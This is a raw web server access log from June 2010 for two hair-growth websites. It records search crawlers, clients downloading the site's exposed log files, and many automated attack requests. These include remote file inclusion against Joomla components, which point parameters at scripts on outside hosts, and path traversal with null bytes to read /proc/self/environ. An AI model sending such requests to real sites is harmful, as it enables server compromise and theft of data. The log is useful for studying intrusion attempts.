93.186.192.124 - - [27/Jun/2010:22:42:37 -0700] "GET /logs/access_100510.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:10 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:10 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:10 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:21 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:22 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:44:23 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.191.40.23 - - [27/Jun/2010:22:45:33 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "freehairsecrets.com"
195.191.40.23 - - [27/Jun/2010:22:45:33 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:09 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:22:56:09 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:22:56:09 -0700] "GET /logs/access_100607.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:22:56:35 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:56:35 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:56:35 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:56:35 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:56:36 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:56:36 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:46 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:46 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:46 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:59 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:59 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:56:59 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:57:02 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:57:02 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:57:02 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.86.106.79 - - [27/Jun/2010:22:58:17 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.bellagemsjewelry.com/images/attributes/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
88.86.106.79 - - [27/Jun/2010:22:58:17 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.bellagemsjewelry.com/images/attributes/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
88.86.106.79 - - [27/Jun/2010:22:58:18 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.bellagemsjewelry.com/images/attributes/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
207.46.13.94 - - [27/Jun/2010:22:58:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
207.46.13.94 - - [27/Jun/2010:22:59:41 -0700] "GET /RecommendedHairGrowthProducts.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
67.195.37.176 - - [27/Jun/2010:23:02:09 -0700] "GET /logs/access_091109.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
66.249.65.186 - - [27/Jun/2010:23:07:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
186.28.232.13 - - [27/Jun/2010:23:12:36 -0700] "GET /logs/access_100419.log///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.maryknoll.org/k12/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [27/Jun/2010:23:12:36 -0700] "GET //?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.maryknoll.org/k12/id.txt?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [27/Jun/2010:23:12:36 -0700] "GET /logs///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.maryknoll.org/k12/id.txt?? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "growlonghairfast.com"
125.231.221.71 - - [27/Jun/2010:23:12:50 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
193.231.187.33 - - [27/Jun/2010:23:13:13 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
193.231.187.33 - - [27/Jun/2010:23:13:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
193.231.187.33 - - [27/Jun/2010:23:13:13 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:13:20 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 851968 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:13:20 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 1179648 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:14:19 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 1900544 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
186.28.232.13 - - [27/Jun/2010:23:14:37 -0700] "GET /logs/access_100111.log///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.maryknoll.org/k12/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:23:15:05 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 1769472 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:15:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:15:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:15:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:16:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:16:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:16:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:17:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.214.148 - - [27/Jun/2010:23:17:14 -0700] "GET /logs/access_100419.log///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.mantisowh.be/images/stories/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.214.148 - - [27/Jun/2010:23:17:14 -0700] "GET //?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.mantisowh.be/images/stories/id.txt?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.214.148 - - [27/Jun/2010:23:17:14 -0700] "GET /logs///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.mantisowh.be/images/stories/id.txt?? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:17:19 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
118.170.196.196 - - [27/Jun/2010:23:18:18 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:18:21 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:18:22 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:18:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:18:23 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:39 -0700] "GET /logs/?D=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:41 -0700] "GET /logs/?M=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:42 -0700] "GET /logs/?S=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:44 -0700] "GET /logs/access_091012.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:46 -0700] "GET /logs/access_091019.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:47 -0700] "GET /logs/access_091026.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:49 -0700] "GET /logs/access_091102.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:50 -0700] "GET /logs/access_091109.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:52 -0700] "GET /logs/access_091116.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:23:18:58 -0700] "GET /logs/access_091123.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:19:54 -0700] "GET /logs/access_100301.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:19:55 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:19:55 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.214.148 - - [27/Jun/2010:23:19:57 -0700] "GET /logs/access_100111.log///?option=com_rssfactory&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.mantisowh.be/images/stories/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:19:59 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:19:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:20:00 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:20:25 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:20:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:20:25 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
119.63.193.75 - - [27/Jun/2010:23:20:37 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:20:57 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:20:58 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:20:58 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:21:27 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:21:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:21:28 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:21:35 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.63.193.75 - - [27/Jun/2010:23:22:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17995 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:23:26 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 1900544 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:24:09 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:24:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:24:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:25:09 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:25:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:25:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:25:48 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:26:00 -0700] "GET /logs/access_100412.log///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:26:00 -0700] "GET //bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [27/Jun/2010:23:26:01 -0700] "GET /logs///bbs///write_comment_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:26:16 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
